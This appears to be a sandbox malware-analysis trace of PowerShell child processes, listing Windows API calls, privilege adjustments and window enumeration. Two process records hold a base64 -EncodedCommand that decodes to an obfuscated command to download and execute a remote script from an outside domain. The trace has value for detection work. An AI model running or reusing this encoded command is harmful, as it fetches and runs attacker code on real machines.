	[0967.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.584] CoTaskMemFree (pv=0x28fa460) 
	[0967.585] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0967.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.585] CoTaskMemFree (pv=0x28fa460) 
	[0968.890] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0968.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.890] CoTaskMemFree (pv=0x28fa460) 
	[0968.892] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0968.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.892] CoTaskMemFree (pv=0x28fa460) 
	[0968.894] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0968.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.894] CoTaskMemFree (pv=0x28fa460) 
	[0968.903] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0968.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.903] CoTaskMemFree (pv=0x28fa460) 
	[0970.099] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0970.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.099] CoTaskMemFree (pv=0x28fa460) 
	[0970.100] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0970.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.100] CoTaskMemFree (pv=0x28fa460) 
	[0970.100] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0970.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.100] CoTaskMemFree (pv=0x28fa460) 

Thread:
	id = 705
	os_tid = 0x15f8


Thread:
	id = 722
	os_tid = 0x1640


Thread:
	id = 1248
	os_tid = 0x160c


Thread:
	id = 1255
	os_tid = 0x1c48


Thread:
	id = 1310
	os_tid = 0x1d98


Thread:
	id = 1379
	os_tid = 0x1f5c


Thread:
	id = 1569
	os_tid = 0x2100


Thread:
	id = 1589
	os_tid = 0x2150

	[0812.728] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0893.045] RegCloseKey (hKey=0x2ec) returned 0x0
	[0893.045] RegCloseKey (hKey=0x2f4) returned 0x0
	[0893.045] RegCloseKey (hKey=0x2f0) returned 0x0

Thread:
	id = 1894
	os_tid = 0x2560


Process:
	id = "125"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5bcea000"
	os_pid = "0x990"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "33"
	os_parent_pid = "0x324"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 624
	os_tid = 0xd9c


Thread:
	id = 689
	os_tid = 0x15ac


Thread:
	id = 711
	os_tid = 0x1610


Thread:
	id = 1542
	os_tid = 0x2068


Thread:
	id = 1550
	os_tid = 0x2088


Thread:
	id = 1601
	os_tid = 0x217c


Thread:
	id = 1703
	os_tid = 0x23d8


Process:
	id = "126"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5ee6d000"
	os_pid = "0xfe0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "25"
	os_parent_pid = "0xaf4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 627
	os_tid = 0xb70

	[0649.571] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0656.303] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0656.304] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0656.304] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0656.304] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0688.154] GetVersionExW (in: lpVersionInformation=0x1add00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1add00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0688.156] GetVersionExW (in: lpVersionInformation=0x1add00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1add00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0688.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0688.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0688.179] GetVersionExW (in: lpVersionInformation=0x1ada70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ada70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0688.180] SetErrorMode (uMode=0x1) returned 0x1
	[0688.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1adbd0 | out: lpFileInformation=0x1adbd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0688.183] SetErrorMode (uMode=0x1) returned 0x1
	[0688.187] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ade40 | out: lpdwHandle=0x1ade40) returned 0x94c
	[0689.632] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d172a0 | out: lpData=0x2d172a0) returned 1
	[0689.635] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1addb8, puLen=0x1addb0 | out: lplpBuffer=0x1addb8*=0x2d1733c, puLen=0x1addb0) returned 1
	[0689.637] lstrlenW (lpString="䅁") returned 1
	[0689.646] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d17418, puLen=0x1add20) returned 1
	[0689.647] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0689.649] CoTaskMemAlloc (cb=0x2e) returned 0x3ab660
	[0689.649] lstrcpyW (in: lpString1=0x3ab660, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0689.650] CoTaskMemFree (pv=0x3ab660) 
	[0689.650] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d1746c, puLen=0x1add20) returned 1
	[0689.650] lstrlenW (lpString="System.Management.Automation") returned 28
	[0689.650] CoTaskMemAlloc (cb=0x3c) returned 0x2e9e80
	[0689.651] lstrcpyW (in: lpString1=0x2e9e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0689.651] CoTaskMemFree (pv=0x2e9e80) 
	[0689.651] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d174c8, puLen=0x1add20) returned 1
	[0689.651] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0689.651] CoTaskMemAlloc (cb=0x20) returned 0x3ad0d0
	[0689.651] lstrcpyW (in: lpString1=0x3ad0d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0689.651] CoTaskMemFree (pv=0x3ad0d0) 
	[0689.651] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d17508, puLen=0x1add20) returned 1
	[0689.651] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0689.651] CoTaskMemAlloc (cb=0x44) returned 0x2e9e80
	[0689.651] lstrcpyW (in: lpString1=0x2e9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0689.651] CoTaskMemFree (pv=0x2e9e80) 
	[0689.651] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d17570, puLen=0x1add20) returned 1
	[0689.651] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0689.651] CoTaskMemAlloc (cb=0x76) returned 0x34f6e0
	[0689.651] lstrcpyW (in: lpString1=0x34f6e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0689.651] CoTaskMemFree (pv=0x34f6e0) 
	[0689.651] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d1760c, puLen=0x1add20) returned 1
	[0689.651] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0689.652] CoTaskMemAlloc (cb=0x44) returned 0x2e9e80
	[0689.652] lstrcpyW (in: lpString1=0x2e9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0689.652] CoTaskMemFree (pv=0x2e9e80) 
	[0689.652] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d17670, puLen=0x1add20) returned 1
	[0689.652] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0689.652] CoTaskMemAlloc (cb=0x58) returned 0x336b20
	[0689.652] lstrcpyW (in: lpString1=0x336b20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0689.652] CoTaskMemFree (pv=0x336b20) 
	[0689.652] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d176ec, puLen=0x1add20) returned 1
	[0689.652] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0689.652] CoTaskMemAlloc (cb=0x20) returned 0x3ad0d0
	[0689.652] lstrcpyW (in: lpString1=0x3ad0d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0689.652] CoTaskMemFree (pv=0x3ad0d0) 
	[0689.652] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x2d17394, puLen=0x1add20) returned 1
	[0689.652] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0689.652] CoTaskMemAlloc (cb=0x66) returned 0x32c220
	[0689.652] lstrcpyW (in: lpString1=0x32c220, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0689.652] CoTaskMemFree (pv=0x32c220) 
	[0689.652] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x0, puLen=0x1add20) returned 0
	[0689.652] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x0, puLen=0x1add20) returned 0
	[0689.653] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1add28, puLen=0x1add20 | out: lplpBuffer=0x1add28*=0x0, puLen=0x1add20) returned 0
	[0689.653] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adcf8, puLen=0x1adcf0 | out: lplpBuffer=0x1adcf8*=0x2d1733c, puLen=0x1adcf0) returned 1
	[0689.654] CoTaskMemAlloc (cb=0x204) returned 0x356330
	[0689.654] VerLanguageNameW (in: wLang=0x0, szLang=0x356330, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0689.655] CoTaskMemFree (pv=0x356330) 
	[0689.656] VerQueryValueW (in: pBlock=0x2d172a0, lpSubBlock="\\", lplpBuffer=0x1add48, puLen=0x1add40 | out: lplpBuffer=0x1add48*=0x2d172c8, puLen=0x1add40) returned 1
	[0691.608] GetCurrentProcessId () returned 0xfe0
	[0691.625] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1acc70 | out: lpLuid=0x1acc70*(LowPart=0x14, HighPart=0)) returned 1
	[0691.629] GetCurrentProcess () returned 0xffffffffffffffff
	[0691.630] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1acc90 | out: TokenHandle=0x1acc90*=0x2ec) returned 1
	[0691.631] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2d1ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0691.633] CloseHandle (hObject=0x2ec) returned 1
	[0691.637] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfe0) returned 0x2ec
	[0693.410] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2d1ab80, cb=0x200, lpcbNeeded=0x1adca8 | out: lphModule=0x2d1ab80, lpcbNeeded=0x1adca8) returned 1
	[0693.412] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2d1adf0, cb=0x18 | out: lpmodinfo=0x2d1adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0693.413] CoTaskMemAlloc (cb=0x804) returned 0x3b5290
	[0693.413] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x3b5290, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0693.414] CoTaskMemFree (pv=0x3b5290) 
	[0693.414] CoTaskMemAlloc (cb=0x804) returned 0x3b5290
	[0693.414] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x3b5290, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0693.415] CoTaskMemFree (pv=0x3b5290) 
	[0693.415] CloseHandle (hObject=0x2ec) returned 1
	[0693.424] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xfe0) returned 0x2ec
	[0693.425] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x1addd8 | out: lpExitCode=0x1addd8*=0x103) returned 1
	[0693.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b088, Length=0x20000, ResultLength=0x1adda0 | out: SystemInformation=0x12d1b088, ResultLength=0x1adda0*=0x3aa40) returned 0xc0000004
	[0693.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d3b0b8, Length=0x3d240, ResultLength=0x1adda0 | out: SystemInformation=0x12d3b0b8, ResultLength=0x1adda0*=0x3aa40) returned 0x0
	[0704.468] EnumWindows (lpEnumFunc=0x20266ac, lParam=0x0) returned 1
	[0707.090] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.090] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x558
	[0707.090] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.090] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x538
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x778
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x778
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.091] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x460
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.092] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1df8
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1da8
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1c70
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x163c
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1a10
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x186c
	[0707.093] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1d74
	[0707.094] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4c8
	[0707.094] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1960
	[0707.094] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ce4
	[0707.094] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b24
	[0707.097] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x14e0
	[0707.097] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x17f0
	[0707.097] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x854
	[0707.097] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1268
	[0707.097] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1624
	[0707.097] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b9c
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16f4
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x145c
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x17d0
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1d28
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xcb8
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1190
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x3a8
	[0707.098] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1bd0
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1bfc
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1a78
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b90
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b04
